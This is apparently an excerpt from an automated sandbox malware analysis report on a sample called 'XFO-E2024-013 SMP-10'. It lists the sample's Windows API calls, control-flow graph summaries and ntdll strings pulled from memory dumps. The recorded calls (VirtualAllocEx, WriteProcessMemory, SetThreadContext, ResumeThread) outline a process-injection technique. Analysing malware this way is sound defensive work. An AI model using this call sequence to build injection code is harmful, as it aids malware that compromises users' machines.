                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0722BA7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0

                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0722BC28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0722BD08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02DBD626,?,?,?,?,?), ref: 02DBD6E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02DBD626,?,?,?,?,?), ref: 02DBD6E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0722BD08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0722BA7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0722BB46
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0722BB46
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0722E245
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02DBAFDE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1387853841.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2db0000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?), ref: 073107F8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391182832.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7310000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?), ref: 073107F8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391182832.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7310000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0

                                                              Execution Graph

                                                              Execution Coverage:1.2%
                                                              Dynamic/Decrypted Code Coverage:5.1%
                                                              Signature Coverage:8%
                                                              Total number of Nodes:137
                                                              Total number of Limit Nodes:11

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 388 417b63-417b7f 389 417b87-417b8c 388->389 390 417b82 call 42f5a3 388->390 391 417b92-417ba0 call 42fba3 389->391 392 417b8e-417b91 389->392 390->389 395 417bb0-417bc1 call 42e043 391->395 396 417ba2-417bad call 42fe43 391->396 401 417bc3-417bd7 LdrLoadDll 395->401 402 417bda-417bdd 395->402 396->395 401->402
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 333 417bde-417bdf 334 417be1-417bf3 333->334 335 417c55-417c67 333->335 339 417c2e-417c38 334->339 337 417c68-417c70 335->337 337->339 340 417c72-417c74 337->340 339->335 341 417c3a-417c3b 339->341 340->337 342 417c76-417c7a 340->342 343 417bca-417bd7 LdrLoadDll 341->343 344 417c3d 341->344 345 417c8c-417c98 342->345 346 417c7c-417c82 342->346 348 417bda-417bdd 343->348 344->335 347 417c99-417cae 345->347 349 417cc0-417cc1 346->349 350 417c84 346->350 352 417cb0 347->352 353 417d17-417d2b call 42b9b3 347->353 350->347 351 417c87 350->351 351->345 354 417cb2-417cbe 352->354 355 417d2e-417d3f 352->355 353->355 354->349
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 358 417bf8-417c23 360 417c70 358->360 361 417c25-417c28 358->361 364 417c72-417c74 360->364 365 417c2e-417c38 360->365 362 417be5-417bf3 361->362 363 417c2a 361->363 362->358 366 417bb8-417bc1 363->366 367 417c2c-417c38 363->367 370 417c76-417c7a 364->370 371 417c68-417c6e 364->371 368 417c55-417c67 365->368 369 417c3a-417c3b 365->369 374 417bc3-417bc9 366->374 375 417bda-417bdd 366->375 367->368 367->369 368->371 372 417bca-417bd7 LdrLoadDll 369->372 373 417c3d 369->373 376 417c8c-417c98 370->376 377 417c7c-417c82 370->377 371->360 372->375 373->368 374->372 378 417c99-417cae 376->378 379 417cc0-417cc1 377->379 380 417c84 377->380 382 417cb0 378->382 383 417d17-417d2b call 42b9b3 378->383 380->378 381 417c87 380->381 381->376 384 417cb2-417cbe 382->384 385 417d2e-417d3f 382->385 383->385 384->379
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 404 42cc63-42cca1 call 404643 call 42db53 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 424 11d2c0a-11d2c0f 425 11d2c1f-11d2c26 LdrInitializeThunk 424->425 426 11d2c11-11d2c18 424->426
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              Strings
                                                              • Invalid debug info address of this critical section, xrefs: 012054B6
                                                              • Thread identifier, xrefs: 0120553A
                                                              • Address of the debug info found in the active list., xrefs: 012054AE, 012054FA
                                                              • Critical section address, xrefs: 01205425, 012054BC, 01205534
                                                              • Critical section address., xrefs: 01205502
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012054E2
                                                              • 8, xrefs: 012052E3
                                                              • double initialized or corrupted critical section, xrefs: 01205508
                                                              • undeleted critical section in freed memory, xrefs: 0120542B
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0120540A, 01205496, 01205519
                                                              • corrupted critical section, xrefs: 012054C2
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012054CE
                                                              • Critical section debug info address, xrefs: 0120541F, 0120552E
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01205543
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              Strings
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0120261F
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01202498
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01202412
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012024C0
                                                              • @, xrefs: 0120259B
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012022E4
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01202409
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012025EB
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01202602
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01202506
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01202624
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              Strings
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01218A67
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01218A3D
                                                              • HandleTraces, xrefs: 01218C8F
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01218B8F
                                                              • VerifierDebug, xrefs: 01218CA5
                                                              • VerifierFlags, xrefs: 01218C50
                                                              • VerifierDlls, xrefs: 01218CBD
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              Strings
                                                              • LdrpInitShimEngine, xrefs: 011E99F4, 011E9A07, 011E9A30
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 011E9A2A
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 011E9A01
                                                              • apphelp.dll, xrefs: 01186496
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011E9A11, 011E9A3A
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011E99ED
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              Strings
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01202180
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01202160, 0120219A, 012021BA
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0120219F
                                                              • SXS: %s() passed the empty activation context, xrefs: 01202165
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012021BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01202178
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
